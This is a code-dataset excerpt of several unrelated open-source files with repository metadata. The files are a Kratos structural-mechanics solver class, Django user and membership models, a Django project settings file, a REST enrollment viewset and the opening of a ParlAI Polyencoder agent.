_create_builder_and_solver
_create_mechanical_solution_strategy
The mechanical_solution_strategy, builder_and_solver, etc. should alway be retrieved
using the getter functions get_mechanical_solution_strategy, get_builder_and_solver,
etc. from this base class.
Only the member variables listed below should be accessed directly.
Public member variables:
model -- the model containing the modelpart used to construct the solver.
settings -- Kratos parameters containing solver settings.
"""
def __init__(self, model, custom_settings):
super(MechanicalSolver, self).__init__(model, custom_settings)
default_settings = KratosMultiphysics.Parameters("""
{
"model_part_name" : "",
"domain_size" : -1,
"echo_level": 0,
"buffer_size": 2,
"analysis_type": "non_linear",
"model_import_settings": {
"input_type": "mdpa",
"input_filename": "unknown_name"
},
"computing_model_part_name" : "computing_domain",
"material_import_settings" :{
"materials_filename": ""
},
"time_stepping" : { },
"rotation_dofs": false,
"reform_dofs_at_each_step": false,
"line_search": false,
"compute_reactions": true,
"block_builder": true,
"clear_storage": false,
"move_mesh_flag": true,
"multi_point_constraints_used": true,
"convergence_criterion": "residual_criterion",
"displacement_relative_tolerance": 1.0e-4,
"displacement_absolute_tolerance": 1.0e-9,
"residual_relative_tolerance": 1.0e-4,
"residual_absolute_tolerance": 1.0e-9,
"max_iteration": 10,
"linear_solver_settings": { },
"problem_domain_sub_model_part_list": ["solid"],
"processes_sub_model_part_list": [""],
"auxiliary_variables_list" : [],
"auxiliary_dofs_list" : [],
"auxiliary_reaction_list" : []
}
""")
# temporary warnings, to be removed
if custom_settings.Has("bodies_list"):
custom_settings.RemoveValue("bodies_list")
warning = '\n::[MechanicalSolver]:: W-A-R-N-I-N-G: You have specified "bodies_list", '
warning += 'which is deprecated and will be removed soon. \nPlease remove it from the "solver settings"!\n'
self.print_warning_on_rank_zero("Bodies list", warning)
if custom_settings.Has("solver_type"):
custom_settings.RemoveValue("solver_type")
warning = '\n::[MechanicalSolver]:: W-A-R-N-I-N-G: You have specified "solver_type", '
warning += 'which is only needed if you use the "python_solvers_wrapper_structural". \nPlease remove it '
warning += 'from the "solver settings" if you dont use this wrapper, this check will be removed soon!\n'
self.print_warning_on_rank_zero("Solver type", warning)
if custom_settings.Has("time_integration_method"):
custom_settings.RemoveValue("time_integration_method")
warning = '\n::[MechanicalSolver]:: W-A-R-N-I-N-G: You have specified "time_integration_method", '
warning += 'which is only needed if you use the "python_solvers_wrapper_structural". \nPlease remove it '
warning += 'from the "solver settings" if you dont use this wrapper, this check will be removed soon!\n'
self.print_warning_on_rank_zero("Time integration method", warning)
# Overwrite the default settings with user-provided parameters.
self.settings.ValidateAndAssignDefaults(default_settings)
model_part_name = self.settings["model_part_name"].GetString()
if model_part_name == "":
raise Exception('Please specify a model_part name!')
# This will be changed once the Model is fully supported!
if self.model.HasModelPart(model_part_name):
self.main_model_part = self.model[model_part_name]
else:
self.main_model_part = self.model.CreateModelPart(model_part_name)
domain_size = self.settings["domain_size"].GetInt()
if domain_size < 0:
raise Exception('Please specify a "domain_size" >= 0!')
self.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.DOMAIN_SIZE, domain_size)
self.print_on_rank_zero("::[MechanicalSolver]:: ", "Construction finished")
# Set if the analysis is restarted
if self.settings["model_import_settings"]["input_type"].GetString() == "rest":
self.main_model_part.ProcessInfo[KratosMultiphysics.IS_RESTARTED] = True
else:
self.main_model_part.ProcessInfo[KratosMultiphysics.IS_RESTARTED] = False
def AddVariables(self):
# this can safely be called also for restarts, it is internally checked if the variables exist already
# Add displacements.
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.REACTION)
# Add specific variables for the problem conditions.
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.POSITIVE_FACE_PRESSURE)
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.NEGATIVE_FACE_PRESSURE)
self.main_model_part.AddNodalSolutionStepVariable(StructuralMechanicsApplication.POINT_LOAD)
self.main_model_part.AddNodalSolutionStepVariable(StructuralMechanicsApplication.LINE_LOAD)
self.main_model_part.AddNodalSolutionStepVariable(StructuralMechanicsApplication.SURFACE_LOAD)
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VOLUME_ACCELERATION)
if self.settings["rotation_dofs"].GetBool():
# Add specific variables for the problem (rotation dofs).
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.ROTATION)
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.REACTION_MOMENT)
self.main_model_part.AddNodalSolutionStepVariable(StructuralMechanicsApplication.POINT_MOMENT)
# Add variables that the user defined in the ProjectParameters
for i in range(self.settings["auxiliary_variables_list"].size()):
variable_name = self.settings["auxiliary_variables_list"][i].GetString()
variable = KratosMultiphysics.KratosGlobals.GetVariable(variable_name)
self.main_model_part.AddNodalSolutionStepVariable(variable)
self.print_on_rank_zero("::[MechanicalSolver]:: ", "Variables ADDED")
def GetMinimumBufferSize(self):
return 2
def AddDofs(self):
# this can safely be called also for restarts, it is internally checked if the dofs exist already
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.DISPLACEMENT_X, KratosMultiphysics.REACTION_X,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.DISPLACEMENT_Y, KratosMultiphysics.REACTION_Y,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.DISPLACEMENT_Z, KratosMultiphysics.REACTION_Z,self.main_model_part)
if self.settings["rotation_dofs"].GetBool():
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ROTATION_X, KratosMultiphysics.REACTION_MOMENT_X,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ROTATION_Y, KratosMultiphysics.REACTION_MOMENT_Y,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ROTATION_Z, KratosMultiphysics.REACTION_MOMENT_Z,self.main_model_part)
# Add dofs that the user defined in the ProjectParameters
if (self.settings["auxiliary_dofs_list"].size() != self.settings["auxiliary_reaction_list"].size()):
raise Exception("DoFs list and reaction list should be the same long")
for i in range(self.settings["auxiliary_dofs_list"].size()):
dof_variable_name = self.settings["auxiliary_dofs_list"][i].GetString()
reaction_variable_name = self.settings["auxiliary_reaction_list"][i].GetString()
if (KratosMultiphysics.KratosGlobals.HasDoubleVariable(dof_variable_name)): # Double variable
dof_variable = KratosMultiphysics.KratosGlobals.GetVariable(dof_variable_name)
reaction_variable = KratosMultiphysics.KratosGlobals.GetVariable(reaction_variable_name)
KratosMultiphysics.VariableUtils().AddDof(dof_variable, reaction_variable,self.main_model_part)
elif (KratosMultiphysics.KratosGlobals.HasArrayVariable(dof_variable_name)): # Components variable
dof_variable_x = KratosMultiphysics.KratosGlobals.GetVariable(dof_variable_name + "_X")
reaction_variable_x = KratosMultiphysics.KratosGlobals.GetVariable(reaction_variable_name + "_X")
KratosMultiphysics.VariableUtils().AddDof(dof_variable_x, reaction_variable_x, self.main_model_part)
dof_variable_y = KratosMultiphysics.KratosGlobals.GetVariable(dof_variable_name + "_Y")
reaction_variable_y = KratosMultiphysics.KratosGlobals.GetVariable(reaction_variable_name + "_Y")
KratosMultiphysics.VariableUtils().AddDof(dof_variable_y, reaction_variable_y, self.main_model_part)
dof_variable_z = KratosMultiphysics.KratosGlobals.GetVariable(dof_variable_name + "_Z")
reaction_variable_z = KratosMultiphysics.KratosGlobals.GetVariable(reaction_variable_name + "_Z")
KratosMultiphysics.VariableUtils().AddDof(dof_variable_z, reaction_variable_z, self.main_model_part)
else:
self.print_warning_on_rank_zero("auxiliary_reaction_list list", "The variable " + dof_variable_name + "is not a compatible type")
self.print_on_rank_zero("::[MechanicalSolver]:: ", "DOF's ADDED")
def ImportModelPart(self):
"""This function imports the ModelPart
"""
self._ImportModelPart(self.main_model_part, self.settings["model_import_settings"])
def PrepareModelPart(self):
if not self.is_restarted():
# Check and prepare computing model part and import constitutive laws.
self._execute_after_reading()
self._set_and_fill_buffer()
KratosMultiphysics.Logger.PrintInfo("::[MechanicalSolver]::", "ModelPart prepared for Solver.")
def Initialize(self):
"""Perform initialization after adding nodal variables and dofs to the main model part. """
self.print_on_rank_zero("::[MechanicalSolver]:: ", "Initializing ...")
# The mechanical solution strategy is created here if it does not already exist.
if self.settings["clear_storage"].GetBool():
self.Clear()
mechanical_solution_strategy = self.get_mechanical_solution_strategy()
mechanical_solution_strategy.SetEchoLevel(self.settings["echo_level"].GetInt())
if not self.is_restarted():
mechanical_solution_strategy.Initialize()
else:
# SetInitializePerformedFlag is not a member of SolvingStrategy but
# is used by ResidualBasedNewtonRaphsonStrategy.
try:
mechanical_solution_strategy.SetInitializePerformedFlag(True)
except AttributeError:
pass
self.print_on_rank_zero("::[MechanicalSolver]:: ", "Finished initialization.")
def InitializeSolutionStep(self):
if self.settings["clear_storage"].GetBool():
self.Clear()
self.Initialize() #required after clearing
self.get_mechanical_solution_strategy().InitializeSolutionStep()
def Predict(self):
self.get_mechanical_solution_strategy().Predict()
def SolveSolutionStep(self):
is_converged = self.get_mechanical_solution_strategy().SolveSolutionStep()
if not is_converged:
msg = "Solver did not converge for step " + str(self.main_model_part.ProcessInfo[KratosMultiphysics.STEP]) + "\n"
msg += "corresponding to time " + str(self.main_model_part.ProcessInfo[KratosMultiphysics.TIME]) + "\n"
self.print_warning_on_rank_zero("::[MechanicalSolver]:: ",msg)
return is_converged
def FinalizeSolutionStep(self):
self.get_mechanical_solution_strategy().FinalizeSolutionStep()
def AdvanceInTime(self, current_time):
dt = self.ComputeDeltaTime()
new_time = current_time + dt
self.main_model_part.ProcessInfo[KratosMultiphysics.STEP] += 1
self.main_model_part.CloneTimeStep(new_time)
return new_time
def ComputeDeltaTime(self):
return self.settings["time_stepping"]["time_step"].GetDouble()
def GetComputingModelPart(self):
if not self.main_model_part.HasSubModelPart(self.settings["computing_model_part_name"].GetString()):
raise Exception("The ComputingModelPart was not created yet!")
return self.main_model_part.GetSubModelPart(self.settings["computing_model_part_name"].GetString())
def ExportModelPart(self):
name_out_file = self.settings["model_import_settings"]["input_filename"].GetString()+".out"
file = open(name_out_file + ".mdpa","w")
file.close()
KratosMultiphysics.ModelPartIO(name_out_file, KratosMultiphysics.IO.WRITE).WriteModelPart(self.main_model_part)
def SetEchoLevel(self, level):
self.get_mechanical_solution_strategy().SetEchoLevel(level)
def Clear(self):
self.get_mechanical_solution_strategy().Clear()
def Check(self):
self.get_mechanical_solution_strategy().Check()
#### Specific internal functions ####
def get_solution_scheme(self):
if not hasattr(self, '_solution_scheme'):
self._solution_scheme = self._create_solution_scheme()
return self._solution_scheme
def get_convergence_criterion(self):
if not hasattr(self, '_convergence_criterion'):
self._convergence_criterion = self._create_convergence_criterion()
return self._convergence_criterion
def get_linear_solver(self):
if not hasattr(self, '_linear_solver'):
self._linear_solver = self._create_linear_solver()
return self._linear_solver
def get_builder_and_solver(self):
if (self.settings["multi_point_constraints_used"].GetBool() is False and
self.GetComputingModelPart().NumberOfMasterSlaveConstraints() > 0):
self.settings["multi_point_constraints_used"].SetBool(True)
self._builder_and_solver = self._create_builder_and_solver()
if not hasattr(self, '_builder_and_solver'):
self._builder_and_solver = self._create_builder_and_solver()
return self._builder_and_solver
def get_mechanical_solution_strategy(self):
if (self.settings["multi_point_constraints_used"].GetBool() is False and
self.GetComputingModelPart().NumberOfMasterSlaveConstraints() > 0):
self._mechanical_solution_strategy = self._create_mechanical_solution_strategy()
if not hasattr(self, '_mechanical_solution_strategy'):
self._mechanical_solution_strategy = self._create_mechanical_solution_strategy()
return self._mechanical_solution_strategy
def import_constitutive_laws(self):
materials_filename = self.settings["material_import_settings"]["materials_filename"].GetString()
if (materials_filename != ""):
# Add constitutive laws and material properties from json file to model parts.
material_settings = KratosMultiphysics.Parameters("""{"Parameters": {"materials_filename": ""}} """)
material_settings["Parameters"]["materials_filename"].SetString(materials_filename)
KratosMultiphysics.ReadMaterialsUtility(material_settings, self.model)
materials_imported = True
else:
materials_imported = False
return materials_imported
def is_restarted(self):
# this function avoids the long call to ProcessInfo and is also safer
# in case the detection of a restart is changed later
return self.main_model_part.ProcessInfo[KratosMultiphysics.IS_RESTARTED]
#### Private functions ####
def _execute_after_reading(self):
"""Prepare computing model part and import constitutive laws. """
# Auxiliary parameters object for the CheckAndPepareModelProcess
params = KratosMultiphysics.Parameters("{}")
params.AddValue("model_part_name",self.settings["model_part_name"])
params.AddValue("computing_model_part_name",self.settings["computing_model_part_name"])
params.AddValue("problem_domain_sub_model_part_list",self.settings["problem_domain_sub_model_part_list"])
params.AddValue("processes_sub_model_part_list",self.settings["processes_sub_model_part_list"])
# Assign mesh entities from domain and process sub model parts to the computing model part.
import check_and_prepare_model_process_structural
check_and_prepare_model_process_structural.CheckAndPrepareModelProcess(self.model, params).Execute()
# Import constitutive laws.
materials_imported = self.import_constitutive_laws()
if materials_imported:
self.print_on_rank_zero("::[MechanicalSolver]:: ", "Constitutive law was successfully imported.")
else:
self.print_on_rank_zero("::[MechanicalSolver]:: ", "Constitutive law was not imported.")
def _set_and_fill_buffer(self):
"""Prepare nodal solution step data containers and time step information. """
# Set the buffer size for the nodal solution steps data. Existing nodal
# solution step data may be lost.
required_buffer_size = self.settings["buffer_size"].GetInt()
if required_buffer_size < self.GetMinimumBufferSize():
required_buffer_size = self.GetMinimumBufferSize()
current_buffer_size = self.main_model_part.GetBufferSize()
buffer_size = max(current_buffer_size, required_buffer_size)
self.main_model_part.SetBufferSize(buffer_size)
# Cycle the buffer. This sets all historical nodal solution step data to
# the current value and initializes the time stepping in the process info.
delta_time = self.main_model_part.ProcessInfo[KratosMultiphysics.DELTA_TIME]
time = self.main_model_part.ProcessInfo[KratosMultiphysics.TIME]
step =-buffer_size
time = time - delta_time * buffer_size
self.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.TIME, time)
for i in range(0, buffer_size):
step = step + 1
time = time + delta_time
self.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.STEP, step)
self.main_model_part.CloneTimeStep(time)
def _add_dynamic_variables(self):
# For being consistent for Serial and Trilinos
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.ACCELERATION)
if self.settings["rotation_dofs"].GetBool():
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.ANGULAR_VELOCITY)
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.ANGULAR_ACCELERATION)
def _add_dynamic_dofs(self):
# For being consistent for Serial and Trilinos
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.VELOCITY_X,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.VELOCITY_Y,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.VELOCITY_Z,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ACCELERATION_X,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ACCELERATION_Y,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ACCELERATION_Z,self.main_model_part)
if(self.settings["rotation_dofs"].GetBool()):
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ANGULAR_VELOCITY_X,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ANGULAR_VELOCITY_Y,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ANGULAR_VELOCITY_Z,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ANGULAR_ACCELERATION_X,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ANGULAR_ACCELERATION_Y,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ANGULAR_ACCELERATION_Z,self.main_model_part)
def _get_convergence_criterion_settings(self):
# Create an auxiliary Kratos parameters object to store the convergence settings.
conv_params = KratosMultiphysics.Parameters("{}")
conv_params.AddValue("convergence_criterion",self.settings["convergence_criterion"])
conv_params.AddValue("rotation_dofs",self.settings["rotation_dofs"])
conv_params.AddValue("echo_level",self.settings["echo_level"])
conv_params.AddValue("displacement_relative_tolerance",self.settings["displacement_relative_tolerance"])
conv_params.AddValue("displacement_absolute_tolerance",self.settings["displacement_absolute_tolerance"])
conv_params.AddValue("residual_relative_tolerance",self.settings["residual_relative_tolerance"])
conv_params.AddValue("residual_absolute_tolerance",self.settings["residual_absolute_tolerance"])
return conv_params
def _create_convergence_criterion(self):
import convergence_criteria_factory
convergence_criterion = convergence_criteria_factory.convergence_criterion(self._get_convergence_criterion_settings())
return convergence_criterion.mechanical_convergence_criterion
def _create_linear_solver(self):
linear_solver_configuration = self.settings["linear_solver_settings"]
if linear_solver_configuration.Has("solver_type"): # user specified a linear solver
from KratosMultiphysics import python_linear_solver_factory as linear_solver_factory
return linear_solver_factory.ConstructSolver(linear_solver_configuration)
else:
# using a default linear solver (selecting the fastest one available)
import KratosMultiphysics.kratos_utilities as kratos_utils
if kratos_utils.IsApplicationAvailable("EigenSolversApplication"):
from KratosMultiphysics import EigenSolversApplication
elif kratos_utils.IsApplicationAvailable("ExternalSolversApplication"):
from KratosMultiphysics import ExternalSolversApplication
linear_solvers_by_speed = [
"pardiso_lu", # EigenSolversApplication (if compiled with Intel-support)
"sparse_lu", # EigenSolversApplication
"pastix", # ExternalSolversApplication (if Pastix is included in compilation)
"super_lu", # ExternalSolversApplication
"skyline_lu_factorization" # in Core, always available, but slow
]
for solver_name in linear_solvers_by_speed:
if KratosMultiphysics.LinearSolverFactory().Has(solver_name):
linear_solver_configuration.AddEmptyValue("solver_type").SetString(solver_name)
self.print_on_rank_zero('::[MechanicalSolver]:: ',\
'Using "' + solver_name + '" as default linear solver')
return KratosMultiphysics.LinearSolverFactory().Create(linear_solver_configuration)
raise Exception("Linear-Solver could not be constructed!")
def _create_builder_and_solver(self):
linear_solver = self.get_linear_solver()
if self.settings["block_builder"].GetBool():
builder_and_solver = KratosMultiphysics.ResidualBasedBlockBuilderAndSolver(linear_solver)
else:
if self.settings["multi_point_constraints_used"].GetBool():
builder_and_solver = KratosMultiphysics.ResidualBasedEliminationBuilderAndSolverWithConstraints(linear_solver)
else:
builder_and_solver = KratosMultiphysics.ResidualBasedEliminationBuilderAndSolver(linear_solver)
return builder_and_solver
def _create_solution_scheme(self):
"""Create the solution scheme for the structural problem.
"""
raise Exception("Solution Scheme creation must be implemented in the derived class.")
def _create_mechanical_solution_strategy(self):
analysis_type = self.settings["analysis_type"].GetString()
if analysis_type == "linear":
mechanical_solution_strategy = self._create_linear_strategy()
elif analysis_type == "non_linear":
if(self.settings["line_search"].GetBool() == False):
mechanical_solution_strategy = self._create_newton_raphson_strategy()
else:
mechanical_solution_strategy = self._create_line_search_strategy()
else:
err_msg = "The requested analysis type \"" + analysis_type + "\" is not available!\n"
err_msg += "Available options are: \"linear\", \"non_linear\""
raise Exception(err_msg)
return mechanical_solution_strategy
def _create_linear_strategy(self):
computing_model_part = self.GetComputingModelPart()
mechanical_scheme = self.get_solution_scheme()
linear_solver = self.get_linear_solver()
builder_and_solver = self.get_builder_and_solver()
return KratosMultiphysics.ResidualBasedLinearStrategy(computing_model_part,
mechanical_scheme,
linear_solver,
builder_and_solver,
self.settings["compute_reactions"].GetBool(),
self.settings["reform_dofs_at_each_step"].GetBool(),
False,
self.settings["move_mesh_flag"].GetBool())
def _create_newton_raphson_strategy(self):
computing_model_part = self.GetComputingModelPart()
mechanical_scheme = self.get_solution_scheme()
linear_solver = self.get_linear_solver()
mechanical_convergence_criterion = self.get_convergence_criterion()
builder_and_solver = self.get_builder_and_solver()
return KratosMultiphysics.ResidualBasedNewtonRaphsonStrategy(computing_model_part,
mechanical_scheme,
linear_solver,
mechanical_convergence_criterion,
builder_and_solver,
self.settings["max_iteration"].GetInt(),
self.settings["compute_reactions"].GetBool(),
self.settings["reform_dofs_at_each_step"].GetBool(),
self.settings["move_mesh_flag"].GetBool())
def _create_line_search_strategy(self):
computing_model_part = self.GetComputingModelPart()
mechanical_scheme = self.get_solution_scheme()
linear_solver = self.get_linear_solver()
mechanical_convergence_criterion = self.get_convergence_criterion()
builder_and_solver = self.get_builder_and_solver()
return KratosMultiphysics.LineSearchStrategy(computing_model_part,
mechanical_scheme,
linear_solver,
mechanical_convergence_criterion,
builder_and_solver,
self.settings["max_iteration"].GetInt(),
self.settings["compute_reactions"].GetBool(),
self.settings["reform_dofs_at_each_step"].GetBool(),
self.settings["move_mesh_flag"].GetBool())
| 58.413926
| 145
| 0.688477
|
794fe387714e74df97b7b6adb6a5fa190de66e94
| 2,601
|
py
|
Python
|
users/models.py
|
benhoyt/pythondotorg
|
954865291a8e4a4c4a4adb269b505d6dbab0eb5f
|
[
"Apache-2.0"
] | null | null | null |
users/models.py
|
benhoyt/pythondotorg
|
954865291a8e4a4c4a4adb269b505d6dbab0eb5f
|
[
"Apache-2.0"
] | null | null | null |
users/models.py
|
benhoyt/pythondotorg
|
954865291a8e4a4c4a4adb269b505d6dbab0eb5f
|
[
"Apache-2.0"
] | null | null | null |
from django.conf import settings
from django.contrib.auth.models import AbstractUser
from django.core.urlresolvers import reverse
from django.db import models
from django.utils import timezone
from markupfield.fields import MarkupField
from .managers import UserManager
DEFAULT_MARKUP_TYPE = getattr(settings, 'DEFAULT_MARKUP_TYPE', 'markdown')
class User(AbstractUser):
bio = MarkupField(blank=True, default_markup_type=DEFAULT_MARKUP_TYPE)
SEARCH_PRIVATE = 0
SEARCH_PUBLIC = 1
SEARCH_CHOICES = (
(SEARCH_PUBLIC, 'Allow search engines to index my profile page (recommended)'),
(SEARCH_PRIVATE, "Don't allow search engines to index my profile page"),
)
search_visibility = models.IntegerField(choices=SEARCH_CHOICES, default=SEARCH_PUBLIC)
EMAIL_PUBLIC = 0
EMAIL_PRIVATE = 1
EMAIL_NEVER = 2
EMAIL_CHOICES = (
(EMAIL_PUBLIC, 'Anyone can see my e-mail address'),
(EMAIL_PRIVATE, 'Only logged-in users can see my e-mail address'),
(EMAIL_NEVER, 'No one can ever see my e-mail address'),
)
email_privacy = models.IntegerField('E-mail privacy', choices=EMAIL_CHOICES, default=EMAIL_NEVER)
objects = UserManager()
def get_absolute_url(self):
return reverse('users:user_detail', kwargs={'slug': self.username})
class Membership(models.Model):
legal_name = models.CharField(max_length=100)
preferred_name = models.CharField(max_length=100)
email_address = models.EmailField(max_length=100)
city = models.CharField(max_length=100, blank=True)
region = models.CharField('State, Province or Region', max_length=100, blank=True)
country = models.CharField(max_length=100, blank=True)
postal_code = models.CharField(max_length=20, blank=True)
# PSF fields
psf_code_of_conduct = models.NullBooleanField('I agree to the PSF Code of Conduct', blank=True)
psf_announcements = models.NullBooleanField('I would like to receive occasional PSF email announcements', blank=True)
created = models.DateTimeField(default=timezone.now, blank=True)
updated = models.DateTimeField(blank=True)
# FIXME: This should be a OneToOneField
creator = models.ForeignKey(User, null=True, blank=True)
# creator = models.OneToOneField(User, null=True, blank=True)
def __str__(self):
if self.creator:
return "Membership object for user: %s" % self.creator.username
else:
return "Membership '%s'" % self.legal_name
def save(self, **kwargs):
self.updated = timezone.now()
return super().save(**kwargs)
| 37.695652
| 121
| 0.720492
|
794fe39613cff7104c15ae5188a98b37eacb4626
| 3,334
|
py
|
Python
|
Calculate-distance/distance_proj/settings.py
|
Aayush-hub/Amazing-Python-Scripts
|
5488454b16fa969d32ad7a56618e62e64291c052
|
[
"MIT"
] | 3
|
2021-01-14T13:54:22.000Z
|
2021-11-15T11:26:51.000Z
|
Calculate-distance/distance_proj/settings.py
|
Aayush-hub/Amazing-Python-Scripts
|
5488454b16fa969d32ad7a56618e62e64291c052
|
[
"MIT"
] | 1
|
2021-02-24T02:06:21.000Z
|
2021-02-24T02:06:21.000Z
|
Calculate-distance/distance_proj/settings.py
|
Aayush-hub/Amazing-Python-Scripts
|
5488454b16fa969d32ad7a56618e62e64291c052
|
[
"MIT"
] | null | null | null |
"""
Django settings for distance_proj project.
Generated by 'django-admin startproject' using Django 3.1.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ns4ev24u@efvcuii*7g1=e)_((y6b2b(%wh(__7d#2y5n3e%t4'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'measurements',
'crispy_forms',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'distance_proj.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'distance_proj.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
CRISPY_ALLOWED_TEMPLATE_PACKS = ('bootstrap', 'uni_form', 'bootstrap3', 'foundation-5')
# CRISPY_TEMPLATE_PACK='bootstap4'
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
GEOIP_PATH = os.path.join(BASE_DIR,'geoip')
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
| 26.460317
| 91
| 0.70246
|
794fe3a29826c70ad02ae0479da3dd8af9e14fba
| 499
|
py
|
Python
|
alunos/views/matriculas.py
|
scpaes/django-REST-framework-project
|
9f2eaf82d5eb742434a16cd69d84983c5f1966d9
|
[
"MIT"
] | null | null | null |
alunos/views/matriculas.py
|
scpaes/django-REST-framework-project
|
9f2eaf82d5eb742434a16cd69d84983c5f1966d9
|
[
"MIT"
] | null | null | null |
alunos/views/matriculas.py
|
scpaes/django-REST-framework-project
|
9f2eaf82d5eb742434a16cd69d84983c5f1966d9
|
[
"MIT"
] | null | null | null |
from alunos.serializer import MatriculaSerializer
from rest_framework import viewsets
from alunos.models import Matricula
from rest_framework.authentication import BasicAuthentication
from rest_framework.permissions import IsAuthenticated
class MatriculaViewSet(viewsets.ModelViewSet):
"""Endpoint de matriculas"""
queryset = Matricula.objects.all()
serializer_class = MatriculaSerializer
permission_classes = [IsAuthenticated]
authentication_classes = [BasicAuthentication]
| 31.1875
| 61
| 0.825651
|
794fe461e3c04b260d93b432513a8ecb087f32ce
| 22,269
|
py
|
Python
|
doc/integrations/pytorch/parlai/agents/transformer/polyencoder.py
|
novium258/cortx-1
|
ce5b939b33b8d24d89b31807ac3bcaa8f24096bc
|
[
"Apache-2.0"
] | 1
|
2020-09-27T05:00:06.000Z
|
2020-09-27T05:00:06.000Z
|
doc/integrations/pytorch/parlai/agents/transformer/polyencoder.py
|
novium258/cortx-1
|
ce5b939b33b8d24d89b31807ac3bcaa8f24096bc
|
[
"Apache-2.0"
] | 1
|
2021-08-04T11:17:39.000Z
|
2021-08-04T11:17:39.000Z
|
doc/integrations/pytorch/parlai/agents/transformer/polyencoder.py
|
novium258/cortx-1
|
ce5b939b33b8d24d89b31807ac3bcaa8f24096bc
|
[
"Apache-2.0"
] | 1
|
2021-05-03T13:27:14.000Z
|
2021-05-03T13:27:14.000Z
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# hack to make sure -m transformer/generator works as expected
"""
Poly-encoder Agent.
"""
from parlai.core.params import ParlaiParser
from typing import Any, Dict, Optional, Tuple
import torch
from parlai.core.opt import Opt
from parlai.core.torch_ranker_agent import TorchRankerAgent
from parlai.utils.misc import recursive_getattr
from parlai.utils.logging import logging
from .biencoder import AddLabelFixedCandsTRA
from .modules import BasicAttention, MultiHeadAttention, TransformerEncoder
from .transformer import TransformerRankerAgent
class PolyencoderAgent(TorchRankerAgent):
"""
Poly-encoder Agent.
Equivalent of bert_ranker/polyencoder and biencoder_multiple_output but does not
rely on an external library (hugging face).
"""
@classmethod
def add_cmdline_args(
cls, parser: ParlaiParser, partial_opt: Optional[Opt] = None
) -> ParlaiParser:
"""
Add command-line arguments specifically for this agent.
